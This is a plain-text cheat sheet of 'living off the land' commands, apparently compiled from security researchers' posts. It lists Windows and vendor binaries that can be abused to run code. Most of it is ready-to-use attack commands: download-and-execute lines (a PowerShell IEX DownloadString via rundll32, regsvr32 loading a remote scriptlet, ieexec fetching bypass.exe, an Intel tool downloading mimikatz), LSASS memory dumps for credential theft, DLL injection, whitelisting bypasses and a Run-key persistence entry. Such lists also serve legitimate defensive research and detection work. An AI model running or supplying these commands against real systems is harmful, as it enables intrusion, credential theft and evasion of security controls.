BinariesThatDoesOtherStuff

BinariesThatDoesOtherStuff.txt

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

bash.exe -c calc.exe

scriptrunner.exe -appvscript calc.exe

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX

hh.exe http://www.google.com or hh.exe c:\

certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file 
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
https://twitter.com/subtee/status/777538038897397761

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

msbuild.exe pshell.xml

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

bginfo.exe bginfo.bgi /popup /nolicprompt

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

ieexec.exe http://x.x.x.x:8080/bypass.exe

msxsl.exe customers.xml script.xsl

odbcconf.exe /f my.rsp

sqldumper.exe 464 0 0x0110:40  - Dump lsass to mimikatz comp. dump
https://twitter.com/countuponsec/status/910977826853068800

sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518

pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872


C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456


runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc


winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992


InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a


sqldumper 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518


fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248


AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat


SQLPS.exe
Powershell host
https://twitter.com/bryon_/status/975835709587075072


Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/

print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE



*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/

symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248

SynTPEnh.exe /SHELLEXEC somebinary.exe  - https://twitter.com/egre55/status/1052907871749459968?s=09 

#Intel
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe" - https://twitter.com/egre55/status/1093821740298448896

iAutorun.exe (Intel Pro Wireless software)
Put in autorun.inf:
XP_APPS_32=c:\windows\system32\notepad.exe
XP_APPS_64=c:\windows\system32\notepad.exe
VISTA_APPS_32=c:\windows\system32\notepad.exe
VISTA_APPS_64=c:\windows\system32\notepad.exe
WIN7_APPS_32=c:\windows\system32\notepad.exe
WIN7_APPS_64=c:\windows\system32\notepad.exe
WIN8_APPS_32=c:\windows\system32\notepad.exe
WIN8_APPS_64=c:\windows\system32\notepad.exe
WINPLUS_APPS_32=c:\windows\system32\notepad.exe
WINPLUS_APPS_64=c:\windows\system32\notepad.exe
RUNMODE=WAIT
http://www.hexacorn.com/blog/2019/08/20/sitting-on-the-lolbins-2/

LaunchDelay.exe notepad.exe 5
Sample: 775DBEC29C3558A61CCFFDBA6E319E4BCF2C5C2EA91C6F5AF04E88C699B7D7A8
http://www.hexacorn.com/blog/2019/08/22/sitting-on-the-lolbins-3/


#Acer
RunCmd_x64.exe C:\windows\system32\calc.exe
https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html

#Plex
plexscripthost.exe  #Pythonscript engine
https://twitter.com/Oddvarmoe/status/1092230434786869249

#Splunk
%USERPROFILE%\AppData\Local\slack\update.exe  --processStart "test.exe"
https://twitter.com/Hexacorn/status/1108429585602019328

#notepad++
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe

#Lotus notes
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes

#Citrix
C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Execute calc.exe through DefaultInstall Section Directive in INF file.

#Tanium
Tpowershell.exe
https://twitter.com/Hexacorn/status/1108288002193805312

#Nvidia GeForce Experience
courgette.exe -dis c:\temp\Autoruns.exe c:\temp\autoruns.asm
courgette.exe -asm c:\temp\autoruns.asm c:\temp\compiled\autorunsfromasm.exe
https://twitter.com/Oddvarmoe/status/1123249551756935169

#Avast
aswRunDll.exe c:\temp\myDll.dll
https://twitter.com/pabraeken/status/1000806146805059585

#Valve
C:\program files(x86)\Steam> writeminidump.exe <PID> C:\outfolder\outfile.dmp
https://twitter.com/pabraeken/status/1000507477329432586

#Pubg Lite
C:\Program Files (x86)\PUBGLite\Client\ucldr_bgl_se.exe mimikatz.exe
https://twitter.com/_felamos/status/1148166305129758720?s=21

#HP Printer drivers
c:\Program Files\HP\<model>\
\Bin\<model>.exe
\Bin\HPCustParticUI.exe
\Bin\hpqDTSS.exe
\Bin\InstanceFinderDlg.exe
\Bin\ScanToPCActivationApp.exe 
\Bin\Toolbox.exe

<binary>.exe -uiDll c:\Test\test.dll

Also possible but needs more arguments:
\Bin\DigitalWizards.exe
\Bin\FaxApplications.exe
\Bin\HPRewards.exe
http://www.hexacorn.com/blog/2019/08/19/sitting-on-the-lolbins-1/


ZOHO Corporation private Limited
dctask64.exe injectDll <dllpath> <PID>
dctask64.exe invokeexe <executable>
https://twitter.com/gN3mes1s/status/1222088214581825540

Avira Antivirus
type cmd.txt  | Avira.PWM.NativeMessaging.exe  - In bat file
https://medium.com/@knikolenko/avira-free-antivirus-password-collector-83452fa7f943
https://twitter.com/malwrhunterteam/status/1258346778421846017

#Cisco Jabber
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#processdump-exe-from-cisco-jabber
https://twitter.com/spotheplanet/status/1310606426172162050

#Discord
discordhookhelper64.exe inject DiscordHook64.dll 0 3785
https://twitter.com/Blackmond_/status/1317035680682397701

#Symantec
https://twitter.com/nas_bench/status/1385599433333686278

#Spotify
https://twitter.com/Hexacorn/status/1412517463892414469
SpotifySetup.exe --url <url>
Other options
--mu ..\..\..\..\..\..\..\..\test\ downloads that file to c:\test\SpWebInst0.exe and launches from there -- silent - quieter, but mini-GUI still shows up

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848